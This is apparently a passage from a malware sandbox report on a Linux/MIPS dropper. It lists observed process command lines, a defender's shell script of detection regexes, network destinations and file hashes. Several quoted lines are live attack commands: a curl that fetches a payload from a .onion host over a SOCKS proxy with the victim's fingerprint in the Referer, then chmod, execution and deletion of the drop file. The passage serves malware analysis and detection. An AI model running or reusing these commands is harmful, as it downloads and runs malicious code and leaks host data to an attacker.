[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]

/usr/bin/head

[head -n 1]

/usr/bin/sort

[sort -uR]

/bin/grep

[grep -Ev [.]0]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $2}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://5.10.228.248:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./1b8f4bb809b6d9f7810d0d4d1656553c -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
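
Seen from the defender's side, the chains in this and the earlier Processes lists give a handful of command-line indicators that survive the rotation of DoH resolvers, relays and drop-file names. The script below is an added example written for this page, not code from the report or from the sandbox vendor: it scans one-command-line-per-line input, tags each hit, and parses the -e value into fingerprint fields, flagging the empty-input MD5. SAMPLE_LOG is constructed from command lines quoted in this report; the input format and the fingerprint field order (external IP, user, uname -m, hostname, MD5) are assumptions taken from the command sequence, not from the sample's source.

```shell
#!/bin/sh
# Added example for this report, not the sample's or the sandbox's code.
# Assumptions: input is one process command line per line (adapt the reader
# to your EDR/auditd export); the fingerprint field order is inferred from
# the command sequence: <ext ip>_<user>_<uname -m>_<hostname>_<md5>_.

# Constructed log built from command lines quoted in this report; the last
# line is benign filler.
SAMPLE_LOG='bash
base64 -d
curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in
curl -4fsSLk checkip.amazonaws.com
curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_
curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_
chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
ls -la /home'

# Indicator table, "tag#ERE"; '#' is the separator because no pattern uses it.
INDICATORS='doh_tor_relay_lookup#dns-query\?name=relay\.tor2socks\.in
onion_via_socks_9050#-x socks5h://[^ ]*:9050 [^ ]*\.onion/
socks_proxy_empty_host#socks5h://:9050
tor2web_fallback#\.tor2web\.in/
referer_fingerprint# -e[0-9]{1,3}(\.[0-9]{1,3}){3}_[^ ]*_[0-9a-f]{32}_
exec_md5_named_drop#^(chmod \+x|rm -f) \./[0-9a-f]{32}$
external_ip_lookup#checkip\.amazonaws\.com'

# Reads command lines on stdin; prints "tag<TAB>cmdline" for every hit.
scan_cmdlines() {
    while IFS= read -r line; do
        printf '%s\n' "$INDICATORS" | while IFS= read -r spec; do
            tag=${spec%%#*}
            re=${spec#*#}
            if printf '%s\n' "$line" | grep -Eq -- "$re"; then
                printf '%s\t%s\n' "$tag" "$line"
            fi
        done
    done
}

# Extracts the -e (Referer) value from a curl command line and prints its
# first five '_'-separated fields; returns 1 when there is no -e argument.
referer_fields() {
    ref=$(printf '%s\n' "$1" | sed -n 's/.*[[:space:]]-e\([^[:space:]]*\).*/\1/p')
    [ -n "$ref" ] || return 1
    printf '%s\n' "$ref" | awk -F_ '{ print $1, $2, $3, $4, $5 }'
}

# MD5 of zero bytes: the digest seen in most of the report's attempts.
is_empty_input_md5() {
    [ "$1" = "d41d8cd98f00b204e9800998ecf8427e" ]
}

main() {
    printf '%s\n' "$SAMPLE_LOG" | scan_cmdlines
    printf '%s\n' "$SAMPLE_LOG" | while IFS= read -r l; do
        f=$(referer_fields "$l") || continue
        set -- $f
        note=''
        is_empty_input_md5 "$5" && note=' (MD5 of empty input)'
        printf 'fingerprint: ext_ip=%s user=%s arch=%s host=%s md5=%s%s\n' \
            "$1" "$2" "$3" "$4" "$5" "$note"
    done
}

main
```

On the constructed log this yields nine tagged lines; the stage-2 curl alone trips three indicators (onion via SOCKS on 9050, empty proxy host, Referer fingerprint). The resolver and relay patterns are deliberately generic so that a new DoH provider or relay address does not silence them; the .onion hostname is not used as an indicator at all, since it is the easiest thing for the operator to change.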

Network

Country Destination Domain Proto
US 1.1.1.1:53 doh-fi.blahdns.com udp
US 1.1.1.1:53 doh-fi.blahdns.com udp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 54.78.143.177:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 52.212.103.61:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 uncensored.lux1.dns.nixnet.xyz udp
LU 104.244.78.231:443 uncensored.lux1.dns.nixnet.xyz tcp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 54.78.143.177:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 dns.twnic.tw udp
TW 101.101.101.101:443 dns.twnic.tw tcp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 54.78.143.177:80 checkip.amazonaws.com tcp
IQ 5.10.228.248:9050 tcp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449